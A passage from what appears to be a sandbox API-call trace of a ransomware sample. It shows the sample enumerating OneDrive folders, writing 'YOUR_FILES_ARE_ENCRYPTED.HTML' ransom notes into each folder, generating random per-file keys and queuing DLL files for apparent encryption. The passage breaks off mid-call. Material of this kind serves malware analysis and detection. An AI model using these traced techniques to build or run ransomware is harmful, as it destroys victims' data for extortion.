returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky" [0113.000] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky\\*" [0113.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51467b17, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51467b17, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x51631498, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.000] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51467b17, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51467b17, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x51631498, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0113.000] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51631498, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51631498, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x516f0240, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.001] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.001] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.001] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.001] lstrlenW (lpString=".mui") returned 4 [0113.001] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.001] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51631498, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51631498, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x516f0240, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.001] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.001] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.001] GetProcessHeap () returned 0x600000 [0113.001] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ky\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.001] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.002] CloseHandle (hObject=0x324) returned 1 [0113.002] GetProcessHeap () returned 0x600000 [0113.002] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.002] GetProcessHeap () returned 0x600000 [0113.002] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.003] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517161bf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x517161bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x517161bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lb-lu", cAlternateFileName="")) returned 1 [0113.003] StrStrIW (lpFirst="lb-lu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.003] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu") returned 81 [0113.003] GetProcessHeap () returned 0x600000 [0113.003] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.004] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu" [0113.004] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu\\*" [0113.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517161bf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x517161bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x518dffc5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0113.005] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x517161bf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x517161bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x518dffc5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0113.005] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x518dffc5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x518dffc5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x519787fb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.005] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.005] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.005] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.005] lstrlenW (lpString=".mui") returned 4 [0113.005] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.005] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x518dffc5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x518dffc5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x519787fb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.005] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0113.006] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.006] GetProcessHeap () returned 0x600000 [0113.006] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\lb-lu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.006] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.007] CloseHandle (hObject=0x324) returned 1 [0113.007] GetProcessHeap () returned 0x600000 [0113.007] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.007] GetProcessHeap () returned 0x600000 [0113.007] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.007] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5125164f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5125164f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x512e9fc5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="LoggingPlatform.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0113.007] StrStrIW (lpFirst="LoggingPlatform.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.007] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll") returned 95 [0113.007] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0113.007] lstrlenW (lpString=".dll") returned 4 [0113.007] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0113.007] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\loggingplatform.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.008] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=108736) returned 1 [0113.008] GetProcessHeap () returned 0x600000 [0113.008] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.026] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="0F") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="F2") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="61") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="BC") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="2E") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="EA") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="91") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="17") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="02") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="1D") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="CE") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="B8") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="CF") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="28") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="63") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="02") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="34") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="04") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="51") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="7A") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="A5") returned 2 [0113.026] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="FE") returned 2 [0113.026] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E4") returned 2 [0113.026] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="4B") returned 2 [0113.026] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="55") returned 2 [0113.026] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="8B") returned 2 [0113.026] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="11") returned 2 [0113.026] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="1C") returned 2 [0113.026] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="2F") returned 2 [0113.026] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="A5") returned 2 [0113.026] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="F7") returned 2 [0113.026] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="01") returned 2 [0113.027] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\LoggingPlatform.dll" [0113.027] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.027] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.027] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x519787fb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x519787fb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x519787fb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lt", cAlternateFileName="")) returned 1 [0113.027] StrStrIW (lpFirst="lt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.027] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt") returned 78 [0113.027] GetProcessHeap () returned 0x600000 [0113.027] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.029] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt" [0113.029] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt\\*" [0113.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x519787fb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x519787fb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x52079625, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626978 [0113.029] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x519787fb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x519787fb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x52079625, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.029] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52079625, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x52079625, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x526e1a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.029] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.029] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.029] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.029] lstrlenW (lpString=".mui") returned 4 [0113.029] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.030] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52079625, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x52079625, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x526e1a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.030] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0113.030] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.030] GetProcessHeap () returned 0x600000 [0113.030] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\lt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.030] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.031] CloseHandle (hObject=0x32c) returned 1 [0113.032] GetProcessHeap () returned 0x600000 [0113.032] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.032] GetProcessHeap () returned 0x600000 [0113.032] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.033] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52990592, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x52990592, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x52990592, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lv", cAlternateFileName="")) returned 1 [0113.033] StrStrIW (lpFirst="lv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.033] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv") returned 78 [0113.033] GetProcessHeap () returned 0x600000 [0113.033] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.034] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv" [0113.034] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv\\*" [0113.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\lv\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52990592, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x52990592, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x52eedb83, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.036] FindNextFileW (in: 